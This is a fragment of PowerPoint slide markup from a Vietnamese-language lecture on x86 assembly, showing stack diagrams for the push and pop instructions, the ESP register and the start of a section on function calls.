              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3D8761-6681-ACC5-2ABC-AE1F7DBE1844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6937625" y="3021657"/>
            <a:ext cx="1874400" cy="738633"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Trước khi thực hiện lệnh</a:t>
            </a:r>
            <a:endParaRPr b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;626;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E350917D-2186-DEFF-AB14-DBA78A43B97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6927809" y="5966967"/>
            <a:ext cx="18744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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sau khi thực hiện lệnh</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;614;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{652A4EC5-712F-FF80-7196-69CEBA54BD3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5463540" y="3810000"/>
            <a:ext cx="785484"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35" name="Google Shape;615;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E9C8F5D-EE35-68EB-446A-07A094974E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6249024" y="3979350"/>
            <a:ext cx="500100" cy="7608"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;616;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC561188-ED52-E478-6AF9-82F7A42D5B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539740" y="5436543"/>
            <a:ext cx="718325"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ESP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37" name="Google Shape;617;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7554FB-F86B-820A-5373-7FF51B621B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6258065" y="5605893"/>
            <a:ext cx="500100" cy="372"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;618;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFF76F9-9827-374D-0A49-B1E299E4EAC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="6922531" y="4507040"/>
            <a:ext cx="1826001" cy="800189"/>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2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="39" name="Google Shape;619;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F80A292-2680-2BC3-7B03-CCC837825B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2850276401"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6820792" y="3822009"/>
          <a:ext cx="2186075" cy="2228016"/>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318288">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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0xcafef00d</a:t>
                      </a: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0" name="Google Shape;624;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51220AC3-22EC-8ADB-7BA3-024AF65EE6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="7010056" y="4331969"/>
            <a:ext cx="1826001"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr sz="20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0A29958-2332-E21C-8781-9215B0E2F35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4176129" y="4715273"/>
            <a:ext cx="1824221" cy="646331"/>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push %eax</a:t>
            </a:r>
          </a:p>
          <a:p>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31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15F-3589-72B5-A348-80CF4D743ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>pop</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34541D8-6B41-B4DE-2D1F-5E71B2886D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1048677"/>
            <a:ext cx="4608476" cy="5428323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Xóa phần tử ở đỉnh stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Cất giá trị ở đỉnh stack(ô nhớ có địa chỉ thấp nhất) vào thanh ghi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tăng giá trị của ESP để thu hồi ô nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ví dụ: sau lệnh pop, thanh ghi EAX có giá trị là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0xcafef00d</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51738F99-3079-67D0-C8AD-2922B598B4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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12" name="Google Shape;613;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C7E9B0-A8AB-A7E6-5E4F-C16C434631C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4012400033"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6818039" y="3845225"/>
          <a:ext cx="2186075" cy="2007278"/>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0"/>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1"/>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2"/>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3"/>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4"/>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8675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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;614;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D3D340-9E6A-5FF3-69C9-93B9B311133E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5522639" y="3795368"/>
            <a:ext cx="785484"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14" name="Google Shape;615;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFCC44A-32AA-253F-E2D4-F99A41B1B891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6308123" y="3964718"/>
            <a:ext cx="500100" cy="7608"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Google Shape;616;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42F81E1-715C-C8D3-10AE-91E53FCEAF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5598839" y="4972056"/>
            <a:ext cx="718325"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ESP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16" name="Google Shape;617;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E774AA-C672-1925-DDCE-C9EBAEB1AE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6317164" y="5141406"/>
            <a:ext cx="500100" cy="372"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;618;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D558FC-411F-0438-1C01-C91DD39391A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="6981630" y="4339743"/>
            <a:ext cx="1826001" cy="800189"/>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2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;625;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B3D8761-6681-ACC5-2ABC-AE1F7DBE1844}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6937625" y="3021657"/>
            <a:ext cx="1874400" cy="738633"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Trước khi thực hiện lệnh</a:t>
            </a:r>
            <a:endParaRPr b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;626;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E350917D-2186-DEFF-AB14-DBA78A43B97A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705601" y="5943600"/>
            <a:ext cx="2298514"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sau khi thực hiện lệnh</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;614;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{652A4EC5-712F-FF80-7196-69CEBA54BD3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490351" y="721207"/>
            <a:ext cx="785484"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35" name="Google Shape;615;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E9C8F5D-EE35-68EB-446A-07A094974E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6275835" y="890557"/>
            <a:ext cx="500100" cy="7608"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;616;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC561188-ED52-E478-6AF9-82F7A42D5B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5566551" y="2347750"/>
            <a:ext cx="718325" cy="430857"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Google Shape;617;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7554FB-F86B-820A-5373-7FF51B621B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6284876" y="2517100"/>
            <a:ext cx="500100" cy="372"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;618;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFF76F9-9827-374D-0A49-B1E299E4EAC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="6949342" y="1418247"/>
            <a:ext cx="1826001" cy="800189"/>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2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr sz="2000" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="39" name="Google Shape;619;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F80A292-2680-2BC3-7B03-CCC837825B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135618540"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6847603" y="733216"/>
          <a:ext cx="2186075" cy="2228016"/>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318288">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">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0xcafef00d</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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318288">
                <a:tc>
                  <a:txBody>
                    <a:body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0" name="Google Shape;624;p75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51220AC3-22EC-8ADB-7BA3-024AF65EE6A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1612847">
            <a:off x="7036867" y="1243176"/>
            <a:ext cx="1826001"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Current stack frame</a:t>
            </a:r>
            <a:endParaRPr sz="20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0A29958-2332-E21C-8781-9215B0E2F35E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4185853" y="4335228"/>
            <a:ext cx="1824221" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pop %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178161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784C-C084-663F-CF5F-D9D001C07B3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lời gọi hàm trong x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
